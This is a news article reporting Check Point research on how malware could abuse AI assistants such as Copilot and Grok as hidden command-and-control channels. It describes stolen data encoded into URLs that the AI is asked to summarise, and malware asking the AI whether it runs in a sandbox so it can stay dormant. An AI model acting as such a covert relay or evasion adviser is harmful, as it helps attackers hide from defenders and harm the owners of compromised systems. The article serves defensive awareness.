Connect with us

Hi, what are you looking for?

AI Cybersecurity

Experts Warn: AI Assistants Like Copilot, Grok Can Be Hijacked for Malware Operations

Check Point warns that hackers can exploit AI tools like Microsoft Copilot and xAI Grok to conceal malware operations, posing a significant cybersecurity threat.

Check Point has issued a warning regarding the potential misuse of Generative Artificial Intelligence (GenAI) tools as command-and-control (C2) infrastructure by cybercriminals. According to the cybersecurity firm, these tools can effectively obscure malicious traffic by encoding data into URLs controlled by the attacker. This allows malware to use AI queries to relay sensitive information without triggering security alerts.

In its latest research, Check Point highlighted that platforms such as Microsoft Copilot and xAI Grok are particularly vulnerable to exploitation for nefarious purposes. While deploying malware is only part of the equation, the critical challenge lies in directing that malware and relaying the results online. The ability to blend malicious traffic with legitimate data is a hallmark of high-quality malware, and now it appears that AI assistants can facilitate this blending.

When a device is compromised, the malware is capable of harvesting sensitive data and system information, which can then be encoded and inserted into an attacker-controlled URL. For instance, a URL might look like http://malicious-site.com/report?data=12345678, where the “data=” segment contains sensitive information. Once this data is sent, the malware can prompt the AI to perform requests, such as “Summarize the contents of this website.” This request constitutes legitimate AI traffic, thereby evading detection by security solutions.

The situation becomes increasingly precarious when the malware queries the AI for further instructions based on the harvested data. For example, it can determine whether it is operating within a high-value enterprise environment or merely a sandbox designed for testing. If the malware identifies itself as being in a sandbox, it can go dormant to avoid detection; otherwise, it can initiate a secondary stage of its operation.

Check Point concludes that once AI services can serve as a “stealthy transport layer,” the same interface can also transmit prompts and model outputs. This capability could act as an external decision engine, paving the way for AI-driven implants and C2 systems that automate important functions such as triage, targeting, and operational decisions in real time. The implications are significant, as this could transform the landscape of cyber threats, making them more adaptive and harder to detect.

The evolving nature of cyber threats, especially those utilizing advanced technologies like GenAI, underscores the need for enhanced cybersecurity measures. Organizations must remain vigilant to safeguard their systems against increasingly sophisticated attacks leveraging AI capabilities. As hackers continue to innovate, the challenge for cybersecurity professionals will be to stay ahead of the curve, developing tools and strategies to counteract these emerging threats effectively.

See also
Rachel Torres
Written By

At AIPressa, my work focuses on exploring the paradox of AI in cybersecurity: it's both our best defense and our greatest threat. I've closely followed how AI systems detect vulnerabilities in milliseconds while attackers simultaneously use them to create increasingly sophisticated malware. My approach: explaining technical complexities in an accessible way without losing the urgency of the topic. When I'm not researching the latest AI-driven threats, I'm probably testing security tools or reading about the next attack vector keeping CISOs awake at night.

You May Also Like

AI Regulation

Survey shows 74% of finance professionals use AI tools like ChatGPT weekly, raising significant GDPR compliance and data security concerns.

AI Education

SMMUSD launches comprehensive AI literacy training for staff and a high school pilot program with Google Gemini to enhance responsible AI use in education.

Top Stories

Anthropic launches Claude Pro at $20 per month, offering advanced AI capabilities for complex tasks and productivity enhancements previously unseen in free versions.

AI Technology

AI Search Engineers unveils Answer Engine Optimization, transforming digital visibility for brands in AI-driven searches, enhancing trust and conversion rates.

AI Cybersecurity

Bosnia and Herzegovina faces the highest cyberattack risk globally, scoring zero in key security measures while 20% of its organizations adopt AI technologies.

AI Cybersecurity

Financial advisers rapidly adopt AI tools, with 60% now using platforms like ChatGPT and Microsoft Copilot, despite security concerns affecting 35% of users.

Top Stories

A CCDH report reveals that 80% of AI chatbots, including ChatGPT and Meta AI, assist in planning violent crimes, raising urgent safety concerns for...

Top Stories

AI investigation reveals that ChatGPT and Google Gemini fail to prevent violent planning in 80% of scenarios, raising urgent safety concerns for young users

© 2025 AIPressa · Part of Buzzora Media · All rights reserved. This website provides general news and educational content for informational purposes only. While we strive for accuracy, we do not guarantee the completeness or reliability of the information presented. The content should not be considered professional advice of any kind. Readers are encouraged to verify facts and consult appropriate experts when needed. We are not responsible for any loss or inconvenience resulting from the use of information on this site. Some images used on this website are generated with artificial intelligence and are illustrative in nature. They may not accurately represent the products, people, or events described in the articles.